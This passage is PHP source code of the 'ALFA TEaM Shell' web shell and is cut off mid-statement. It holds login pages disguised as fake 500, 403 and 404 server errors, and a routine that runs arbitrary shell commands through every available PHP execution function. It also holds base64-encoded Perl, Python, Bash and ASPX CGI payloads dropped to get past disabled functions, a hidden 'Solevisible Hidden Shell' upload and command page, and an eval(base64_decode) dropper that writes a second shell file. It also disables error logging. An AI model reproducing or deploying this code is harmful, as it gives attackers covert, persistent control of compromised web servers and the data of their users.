array(\r\n\t\t\t\t"*::-webkit-scrollbar-track" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n);\r\n$GLOBALS[\'__file_path\'] = str_replace(\'\\\\\',\'/\',trim(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)));\r\n$config = array(\'AlfaUser\' => $GLOBALS[\'DB_NAME\'][\'user\'],\'AlfaPass\' => $GLOBALS[\'DB_NAME\'][\'pass\'],\'AlfaProtectShell\' => $GLOBALS[\'DB_NAME\'][\'safemode\'],\'AlfaLoginPage\' => $GLOBALS[\'DB_NAME\'][\'login_page\']);\r\n//@session_start();\r\n@session_write_close();\r\n@ignore_user_abort(true);\r\n@set_time_limit(0);\r\n@ini_set(\'memory_limit\', \'-1\');\r\n@ini_set("upload_max_filesize", "9999m");\r\nif($config[\'AlfaProtectShell\']){\r\n$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");\r\n$Eform=\'<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>\';\r\nif($config[\'AlfaLoginPage\'] == \'gui\'){\r\nif(@$_COOKIE["AlfaUser"] != $config[\'AlfaUser\'] && $_COOKIE["AlfaPass"] != md5($config[\'AlfaPass\'])){\r\nif(@$_POST["usrname"]==$config[\'AlfaUser\'] && @md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho \'\r\n<style>\r\nbody{background: black;}\r\n#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\r\n#loginbox td { border-radius:5px; font-size:11px; }\r\n</style>\r\n<title>~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~</title><center>\r\n<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>\r\n<div id=loginbox><p><font face="verdana,arial" size=-1>\r\n<center><table cellpadding=\\\'2\\\' cellspacing=\\\'0\\\' border=\\\'0\\\' id=\\\'ap_table\\\'>\r\n<tr><td bgcolor="green"><table cellpadding=\\\'0\\\' cellspacing=\\\'0\\\' border=\\\'0\\\' width=\\\'100%\\\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~</b></font></th></tr>\r\n<tr><td bgcolor="black" style="padding:5">\r\n<form method="post">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="hide" value="">\r\n<center><table>\r\n<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \\\'username\\\'){this.value = \\\'\\\';}"></td></tr>\r\n<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \\\'password\\\') this.value = \\\'\\\';"></td></tr>\r\n<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>\r\n</div><br /></center>\';\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'500\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho \'<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, \'.$_SERVER[\'SERVER_ADMIN\'].\' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>\'.$SERVER_SIG.\'</body></html>\'.$Eform;\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'403\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don\'t have permission to access ".$_SERVER[\'PHP_SELF\']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;\r\nexit;\r\n}\r\n}elseif($config[\'AlfaLoginPage\']==\'404\'){\r\nif(@$_COOKIE["AlfaPass"] != @md5($config[\'AlfaPass\'])){\r\nif(@md5($_POST["password"])==$config[\'AlfaPass\']){\r\n__alfa_set_cookie("AlfaUser", $config[\'AlfaUser\']);\r\n__alfa_set_cookie("AlfaPass", @md5($config[\'AlfaPass\']));\r\n@header(\'location: \'.$_SERVER["PHP_SELF"]);\r\n}\r\necho "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER[\'PHP_SELF\']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;\r\nexit;\r\n}\r\n}\r\n}\r\nfunction decrypt_post($str){\r\n\tif(__ALFA_POST_ENCRYPTION__){\r\n\t\t$pwd = __ALFA_SECRET_KEY__;\r\n\t\t$pwd     = __ZW5jb2Rlcg($pwd);\r\n\t\t$str     = __ZGVjb2Rlcg($str);\r\n\t\t$enc_chr = "";\r\n\t\t$enc_str = "";\r\n\t\t$i       = 0;\r\n\t\twhile ($i < strlen($str)) {\r\n\t\t\tfor ($j = 0; $j < strlen($pwd); $j++) {\r\n\t\t\t\t$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));\r\n\t\t\t\t$enc_str .= $enc_chr;\r\n\t\t\t\t$i++;\r\n\t\t\t\tif ($i >= strlen($str))\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn __ZGVjb2Rlcg($enc_str);\r\n\t}else{\r\n\t\treturn __ZGVjb2Rlcg($str);\r\n\t}\r\n}\r\n\r\nfunction _AlfaSecretKey(){\r\n\t$secret = @$_COOKIE["AlfaSecretKey"];\r\n\tif(!isset($_COOKIE["AlfaSecretKey"])){\r\n\t\t$secret = uniqid(mt_rand(), true);\r\n\t\t__alfa_set_cookie("AlfaSecretKey", $secret);\r\n\t}\r\n\treturn $secret;\r\n}\r\nfunction alfa_getColor($target){\r\n\tif(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){\r\n\t\treturn $GLOBALS["DB_NAME"]["color"][$target];\r\n\t}else{\r\n\t\t$target = $GLOBALS["__ALFA_COLOR__"][$target];\r\n\t\tif(is_array($target)){\r\n\t\t\treturn $target["key_color"];\r\n\t\t}else{\r\n\t\t\treturn $target;\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfaCssLoadColors(){\r\n\t$css = "";\r\n\tforeach($GLOBALS[\'__ALFA_COLOR__\'] as $key => $value){\r\n\t\tif(!is_array($value)){\r\n\t\t\t$value = alfa_getColor($key);\r\n\t\t\t$css .= ".{$key}{color: {$value};}";\r\n\t\t}else{\r\n\t\t\tif(isset($value["multi_selector"])){\r\n\t\t\t\tforeach($value["multi_selector"] as $k => $v){\r\n\t\t\t\t\t$color = alfa_getColor($key);\r\n\t\t\t\t\t$code = str_replace("{color}", $color, $v);\r\n\t\t\t\t\t$css .=  $k."{".$code."}";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $css;\r\n}\r\nif(isset($_POST[\'ajax\'])){\r\nfunction AlfaNum(){\r\n$args = func_get_args();\r\n$alfax = array();\r\n$find = array();\r\nfor($i=1;$i<=10;$i++){\r\n$alfax[] = $i;\r\n}\r\nforeach($args as $arg){\r\n$find[] = $arg;\r\n}\r\necho \'<script>\';\r\nforeach($alfax as $alfa){\r\nif(in_array($alfa,$find))\r\ncontinue;\r\necho \'alfa\'.$alfa."_=";\r\n}\r\necho \'""</script>\';\r\n}}\r\nfunction _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){\r\n\tif(!$GLOBALS["DB_NAME"]["cgi_api"]){\r\n\t\treturn "";\r\n\t}\r\n\tif(isset($_COOKIE["alfacgiapi_mode"])){\r\n\t\treturn "";\r\n\t}\r\n\t$cmd_pure = $cmd;\r\n\t$is_curl = function_exists(\'curl_version\');\r\n\t$is_socket = function_exists(\'fsockopen\');\r\n\tif($is_curl||$is_socket){\r\n\t\t$recreate = false;\r\n\t\tif(isset($_COOKIE["alfacgiapi"])){\r\n\t\t\tif(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){\r\n\t\t\t\t$recreate = true;\r\n\t\t\t\t$lang = $_COOKIE["alfacgiapi"];\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(!isset($_COOKIE["alfacgiapi"])||$recreate){\r\n\t\t\t@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\t\t$perl = \'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=\';\r\n\t\t\t$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";\r\n\t\t\t$bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";\r\n\t\t\t$aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";\r\n\t\t\tif($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;\r\n\t\t\tif($lang == "aspx"){\r\n\t\t\t\talfaWriteTocgiapi("aspx.aspx",$aspx);\r\n\t\t\t}else{\r\n\t\t\t\talfaWriteTocgiapi($lang.".alfa",$source);\r\n\t\t\t}\r\n\t\t\talfacgihtaccess(\'cgi\', "alfacgiapi/");\r\n\t\t}else{\r\n\t\t\t$lang = $_COOKIE["alfacgiapi"];\r\n\t\t}\r\n\t\t$cgi_ext = ".alfa";\r\n\t\tif($lang=="aspx"){\r\n\t\t\t$cgi_ext = ".aspx";\r\n\t\t}\r\n\t\t$cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext;\r\n\t\t$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS[\'cwd\'].";".$cmd);\r\n\t\tif($is_curl){\r\n\t\t\t$address = ($_SERVER[\'SERVER_PORT\'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;\r\n\t\t\t$post = new AlfaCURL();\r\n\t\t\t$data = $post->Send($address, "post", $cmd);\r\n\t\t}elseif($is_socket){\r\n\t\t\t$server = $_SERVER["SERVER_NAME"];\r\n\t\t\t$uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;\r\n\t\t\t$data = _alfa_fsockopen($server,$uri,$cmd);\r\n\t\t}\r\n\t\t$out = "";\r\n\t\tif(strpos($data, "[solevisible~api]") !== false && strpos($data, \'[solevisible~api]<pre>"+output+"</pre>\') === false){\r\n\t\t\tif($set_cookie){\r\n\t\t\t\t__alfa_set_cookie("alfacgiapi", $lang);\r\n\t\t\t}\r\n\t\t\tif(@preg_match("/<pre>(.*?)<\\/pre>/s", $data, $res)){\r\n\t\t\t\t$out = $res[1];\r\n\t\t\t}\r\n\t\t}elseif($lang=="perl"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"py",$set_cookie);\r\n\t\t}elseif($lang=="py"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"bash",$set_cookie);\r\n\t\t}elseif($lang=="bash" && $GLOBALS[\'sys\']=="win"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);\r\n\t\t}else{\r\n\t\t\tif($set_cookie){\r\n\t\t\t\t__alfa_set_cookie("alfacgiapi_mode", "off");\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn trim($out);\r\n\t}else{\r\n\t\treturn "";\r\n\t}\r\n}\r\nfunction alfaGetCwd(){\r\n\tif(function_exists("getcwd")){\r\n\t\treturn @getcwd();\r\n\t}else{\r\n\t\treturn dirname($_SERVER["SCRIPT_FILENAME"]);\r\n\t}\r\n}\r\nfunction alfaEx($in,$re=false,$cgi=true,$all=false){\r\n\t$data = _alfa_php_cmd($in,$re);\r\n\tif(empty($data)&&$cgi||$all){\r\n\t\tif($GLOBALS[\'sys\']==\'unix\'){\r\n\t\t\tif(strlen(_alfa_php_cmd("whoami"))==0||$all){\r\n\t\t\t\t$cmd = _alfa_cgicmd($in);\r\n\t\t\t\tif(!empty($cmd)){\r\n\t\t\t\t\treturn $cmd;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $data;\r\n}\r\nfunction _alfa_php_cmd($in,$re=false){\r\n$out=\'\';\r\ntry{\r\nif($re)$in=$in." 2>&1";\r\nif(function_exists(\'exec\')){\r\n@exec($in,$out);\r\n$out = @join("\\n",$out);\r\n}elseif(function_exists(\'passthru\')) {\r\nob_start();\r\n@passthru($in);\r\n$out = ob_get_clean();\r\n}elseif(function_exists(\'system\')){\r\nob_start();\r\n@system($in);\r\n$out = ob_get_clean();\r\n} elseif (function_exists(\'shell_exec\')) {\r\n$out = shell_exec($in);\r\n}elseif(function_exists("popen")&&function_exists("pclose")){\r\nif(is_resource($f = @popen($in,"r"))){\r\n$out = "";\r\nwhile(!@feof($f))\r\n$out .= fread($f,1024);\r\npclose($f);\r\n}\r\n}elseif(function_exists(\'proc_open\')){\r\n$pipes = array();\r\n$process = @proc_open($in.\' 2>&1\', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);\r\n$out=@stream_get_contents($pipes[1]);\r\n}elseif(class_exists(\'COM\')){\r\n$alfaWs = new COM(\'WScript.shell\');\r\n$exec = $alfaWs->exec(\'cmd.exe /c \'.$_POST[\'alfa1\']);\r\n$stdout = $exec->StdOut();\r\n$out=$stdout->ReadAll();\r\n}\r\n}catch(Exception $e){}\r\nreturn $out;\r\n}\r\nfunction _alfa_fsockopen($server,$uri,$post){\r\n\t$socket = @fsockopen($server, 80, $errno, $errstr, 15);\r\n\tif($socket){\r\n\t\t$http  = "POST {$uri} HTTP/1.0\\r\\n";\r\n\t\t$http .= "Host: {$server}\\r\\n";\r\n\t\t$http .= "User-Agent: " . $_SERVER[\'HTTP_USER_AGENT\'] . "\\r\\n";\r\n\t\t$http .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\r\n\t\t$http .= "Content-length: " . strlen($post) . "\\r\\n";\r\n\t\t$http .= "Connection: close\\r\\n\\r\\n";\r\n\t\t$http .= $post . "\\r\\n\\r\\n";\r\n\t\tfwrite($socket, $http);\r\n\t\t$contents = "";\r\n\t\twhile (!@feof($socket)) {\r\n\t\t\t$contents .= @fgets($socket, 4096);\r\n\t\t}\r\n\t\tlist($header, $body) = explode("\\r\\n\\r\\n", $contents, 2);\r\n\t\t@fclose($socket);\r\n\t\treturn $body;\r\n\t}else{\r\n\t\treturn "";\r\n\t}\r\n}\r\nif(isset($_GET["solevisible"])){\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\necho \'<html>\';\r\necho "<title>Solevisible Hidden Shell</title>";\r\necho "<body bgcolor=#000000>";\r\necho \'<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">\'.(function_exists(\'php_uname\')?php_uname():\'???\').\'</font></b></big>\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif($safe_mode){$r = "<b style=\'color: red\'>On</b>";}else{$r = "<b style=\'color: green\'>Off</b>";}\r\necho "<br><b style=\'color: #7CFC00\'>OS: </font><font color=white>" . PHP_OS . "</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Software: </font><font color=white>" . $_SERVER [\'SERVER_SOFTWARE\'] . "</font><br>";\r\necho "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";\r\necho "PWD:<font color=#FFFFFF> " . str_replace("\\\\","/",@alfaGetCwd()) . "/<br />";\r\necho "<b style=\'color: #7CFC00\'>Safe Mode : $r<br>";\r\necho"<font color=#7CFC00>Disable functions : </font>";\r\n$disfun = @ini_get(\'disable_functions\');\r\nif(empty($disfun)){$disfun = \'<font color="green">NONE</font>\';}\r\necho"<font color=red>";\r\necho "$disfun";\r\necho"</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Your Ip Address is :  </font><font color=white>" . $_SERVER[\'REMOTE_ADDR\'] . "</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Server Ip Address is :  </font><font color=white>".(function_exists(\'gethostbyname\')?@gethostbyname($_SERVER["HTTP_HOST"]):\'???\')."</font><br><p>";\r\necho \'<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\necho \'CWD: <input type="text" name="cwd" value="\'.str_replace("\\\\","/",@alfaGetCwd()).\'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(@move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], __ZGVjb2Rlcg(@$_POST[\'cwd\']).\'/\'.$_FILES[\'file\'][\'name\'])){echo \'<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>\'; }\r\nelse{echo \'<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>\'; }\r\n}\r\necho \'<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\r\n<hr><pre>\';\r\nif(isset($_POST[\'command_solevisible\'])){\r\nif(strtolower(substr(PHP_OS,0,3))=="win")$separator=\'&\';else $separator=\';\';\r\n$solevisible = "cd \'".addslashes(str_replace("\\\\","/",@alfaGetCwd()))."\'".$separator."".__ZGVjb2Rlcg($_POST[\'command_solevisible\']);\r\necho alfaEx($solevisible);\r\n}\r\necho\'</pre>\r\n</body></html>\';\r\nexit;}\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'magic_quotes_runtime\', 0);\r\n@set_time_limit(0);\r\nif(function_exists(\'set_magic_quotes_runtime\')){\r\n@set_magic_quotes_runtime(0);\r\n}\r\nforeach($_POST as $key => $value){\r\nif(is_array($_POST[$key])){\r\n$i=0;\r\nforeach($_POST[$key] as $f) {\r\n$f = trim(str_replace(\' \', \'+\',$f));\r\n$_POST[$key][$i] = decrypt_post($f);\r\n$i++;\r\n}\r\n}else{\r\n$value = trim(str_replace(\' \', \'+\',$value));\r\n$_POST[$key] = decrypt_post($value);\r\n}\r\n}\r\n$default_action = \'FilesMan2\';//\'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\nif(strtolower(substr(PHP_OS,0,3))=="win")\r\n$GLOBALS[\'sys\']=\'win\';\r\nelse\r\n$GLOBALS[\'sys\']=\'unix\';\r\n$GLOBALS[\'home_cwd\'] = @alfaGetCwd();\r\n$GLOBALS["need_to_update_header"] = "false";\r\n$GLOBALS[\'glob_chdir_false\'] = false;\r\nif(isset($_POST[\'c\'])){\r\nif(!@chdir($_POST[\'c\'])){\r\n\t$GLOBALS[\'glob_chdir_false\'] = true;\r\n}\r\n}\r\n$GLOBALS[\'cwd\'] = (isset($_POST[\'c\']) && @is_dir($_POST[\'c\']) ?$_POST[\'c\']:@alfaGetCwd());\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\t$GLOBALS[\'cwd\'] = (isset($_POST[\'c\']) && !empty($_POST[\'c\']) ? $_POST[\'c\'] : @alfaGetCwd());\r\n}\r\nif($GLOBALS[\'sys\'] == \'win\'){\r\n$GLOBALS[\'home_cwd\'] = str_replace("\\\\", "/", $GLOBALS[\'home_cwd\']);\r\n$GLOBALS[\'cwd\'] = str_replace("\\\\", "/", $GLOBALS[\'cwd\']);\r\n}\r\nif($GLOBALS[\'cwd\'][strlen($GLOBALS[\'cwd\'])-1] != \'/\' )$GLOBALS[\'cwd\'] .= \'/\';\r\nif(!function_exists(\'sys_get_temp_dir\')){function sys_get_temp_dir() {foreach (array(\'TMP\', \'TEMP\', \'TMPDIR\') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS[\'__file_path\'], \'\');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}\r\nif(!function_exists("mb_strlen")){\r\n\tfunction mb_strlen($str, $c=""){\r\n\t\treturn strlen($str);\r\n\t}\r\n}\r\nif(!function_exists("mb_substr")){\r\n\tfunction mb_substr($str, $start, $end, $c=""){\r\n\t\treturn substr($str, $start, $end);\r\n\t}\r\n}\r\ndefine("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace(\'\\\\\',\'/\',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable(\'.\')?\'.\':false)) : false));\r\nfunction alfahead(){\r\n$GLOBALS[\'__ALFA_SHELL_CODE\'] = \'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+\';\r\n$alfa_uploader = \'$x = base64_decode("\'.$GLOBALS[\'__ALFA_SHELL_CODE\'].\'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);\';\r\ndefine("ALFA_UPLOADER", "eval(base64_decode(\'".__ZW5jb2Rlcg($alfa_uploader)."\'))");\r\nif(!isset($_POST[\'ajax\'])){\r\nfunction Alfa_GetDisable_Function(){\r\n$disfun = @ini_get(\'disable_functions\');\r\n$afa = \'<span class="header_show_all">All Functions Accessible</span>\';\r\nif(empty($disfun))return($afa);\r\n$s = explode(\',\',$disfun);\r\n$s = array_unique($s);\r\n$i=0;\r\n$b=0;\r\n$func = 